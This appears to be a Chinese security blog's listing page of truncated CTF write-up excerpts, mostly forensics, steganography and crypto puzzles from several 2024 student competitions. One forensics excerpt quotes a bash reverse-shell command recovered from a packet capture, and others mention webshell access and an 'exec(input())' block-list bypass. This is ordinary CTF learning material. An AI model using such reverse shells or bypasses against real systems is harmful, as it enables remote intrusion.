精选分类

文章列表

4.5k4 分钟

# 第一届 “吾杯” 网络安全技能大赛 # Web # Sign 题目提示了 “输入密码即可使用蚁剑”,直接尝试蚁剑连接即可,然后在根目录下发现 flag 文件 # Crypto # Easy 题目中给出的伪代码和数据描述了如何生成密钥流并用它来 解密 flag 。 key = "hello world" 是解密的密钥。 要恢复原始的 flag ,我们需要逆向加密过程,步骤如下: 初始化状态 我们将 S 数组初始化为 0-255 ,并用 key 填充 T 数组。 扰乱数组 按照伪代码中给定的方式,通过 s[i] 和 s[j]
2.9k3 分钟

# 2024 深育杯 本次比赛也是取证题做爽了,可惜就搞出来几题... 搬运的群友和官方 WP (部分) # PWN 流量包 20662 发现一个 zip,解压出来一个 jsp 文件,是一个木马 得到: 192.168.233.1+userLogin.jsp+2024-11-13 23:53 PWN1:flag{3018ec0e9ca0fb52d0a43836cc727b59} 得到: bash -i >& /dev/tcp/192.168.233.133/8888 0>&1 PWN2:f
3.1k3 分钟

# Misc # ek1ng_want_girlfriend wireshark 打开附件,点击 ⽂件 - 导出对象 - HTTP 即可导出⼀张图⽚,flag 在图⽚上 # ezWord 这一题是俺们滴 Miku 小姐,来了啊~叔叔的本命(可惜没捣鼓出来 0.o 题目给的是一个 word 文件,一般都是改后缀成压缩包,当时先是改成 txt 看到了 PK 打头知道是压缩包了。 给的两张图片我还以为又是什么隐写,又是 stegsolve 和 010Editor 搞一出毛用都没,后来出题人说是盲注,也算是 Get 新知识了。 这里又学到一个新工具 ————BlindWaterMa
2.9k3 分钟

# Misc 介于当时只练习了 Misc 类的题目,本次的 hgame 只做了 Misc 的题目(虽然也没有全部做出来) # SignIn https://lab.magiconch.com/xzk/ 出题人是用这个网站弄出来的 解题:把图⽚拿⼿机打开从充电⼝向屏幕⾥⾯看即可 或者对图像进⾏⼀些简单的变换就能看到啦٩(ˊˋ)و 拿 PS,PPT,图⽚编辑等等⼯具都⾏,其实把图⽚压扁就差不多能看出来啦 # 希⼉希⼉希尔 这一题可以说是 “印象最深的一集”。 一开始看到题目名字就知道出题人也是个老舰长了,后面这个可以说是一个伏笔吧。 ⾸先我们打开图⽚
9.3k8 分钟

# MISC 这次的 MISC 是真的佩服 Aura 佬的题目,给跪了,orz # 派森 题目: 腐乳昂木 奥普瑞特儿 阴坡尔特 艾克斯奥尔 腐乳昂木 提克有第爱慕 阴坡尔特 ⭐ 弗拉格 等于 布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉布拉 印刻 等于 左中括号右中括号 佛儿 唉 因 梯软者左括号 零,楞左括号弗拉格右括号,四右括号冒号 印刻。鹅潘德(艾克斯奥尔(奥尔德(弗拉格【唉】),奥尔德(弗拉格【唉加二】))) 印刻。鹅潘德(艾克斯奥尔(奥尔德(弗拉格【唉加一】),奥尔德(弗拉格【唉加三】))) 印刻。鹅潘德(奥尔德(弗拉格【唉
11k10 分钟

# MISC 暑假半路打的,本次只记录个人认为需要记录的题目。直接搬的官方的 WP # 正着看还是反着看? 010 Editor 打开,除了 txt.galf 也可以看见末尾明显 JFIF 特征 文件的本质就是一堆字节。像 010 Editor 这样的十六进制编辑器可以查看 / 编辑文件的原始字节流。 大部分文件有其固定的文件结构,常见的图片格式如 PNG、JPG 等都是由一系列特定的数据块组成的。在许多非文本文件的开头,都有一片区域来显示这个文件的格式,这就是文件头标志。例如 JPG 开头通常是 ÿØÿà..JFIF 这样的模式,看到这个模式就知道是 JPG 文件。 将
1.9k2 分钟

# MISC # Quarantine 本人 MISC 的第一道取证分析题目,理所当然的没搞出来,嘻嘻🤭 题目描述: shenghuo2 发来的文件被隔离了,也许通过一些取证技术可以在提取到的数据文件中发现什么信息....... hint:Do you know Windows defender? 结合题目描述和题目名称,关键词搜索很容易定位到 Windows defender 的隔离文件 例如:https://blog.fox-it.com/2023/12/14/reverse-reveal-recover-windows-def
3.7k3 分钟

# 2024 年四川省大学生信息安全技术大赛 ——“安恒杯” # MISC 本次比赛的 MISC 题目还是有点难度的,而且出的不是太常见的类型,也是学习到了... 而且比赛难度和平时的一些线上赛不是一个级别的,真是打了几年,还是新生赛。 # unzip-png 题目:一个 “1.txt” 题目描述:就让这大风吹大风吹一直吹 这一题我觉得是真神经... 这个描述我一开始以为是要一直解码,然后找到关键的 PNG 文件头,结果就是个🥚后来这就是句歌词...... 给的是一个 txt 文本,里面内容很长,刚看是一点头绪都没 789cedfd49ae2d4793ec7bf6038839ec21b
12k11 分钟

# 蜀道山高校联合公益赛 搬运的 “我们中出了一个内鬼” 团队的 WP # MISC # Golf 全⻆字符绕过阻⽌名单 exec(input()) # Summit Potato Potato.png 数据流后⾯分离出 xlsx ⽂件 (这里用 Foremost 出来 xlsx 文件,Binwalk 提取出来的打开有问题),第⼆个⼯作表按逻辑得到 Loe*n (第四个字符可以是任意字符),⽤来对 key.bin.xored 循环异或,根据语义和异或的规律尝试得到第四个字符为 n 下载:https://github.com/CelestialCart
25k23 分钟

# 2024YLCTF WP MISC 篇 原创:源鲁安全实验室 搬的官方 wp,因为好多题忘了咋解的了... # Round 1 # 乌⻳⼦啦 拿到⼀串 base64 的编码,观察发现这是⼀个图⽚转 base64 的操作,cyberchef 转成图⽚ 然后可以得到⼀张全都是 01 的图⽚,我们⽤ ocr 将它识别出来。 因为只有 01 所以 ocr 的准确率⽐较⾼,由于图⽚较⻓可考虑分 10 段 ocr 识别。 由于只有 01 考虑⿊⽩像素,可能是⼆维码,写个脚本转换即可(也可随波逐流 10 字符 串转图⽚) from PIL import Image from zlib import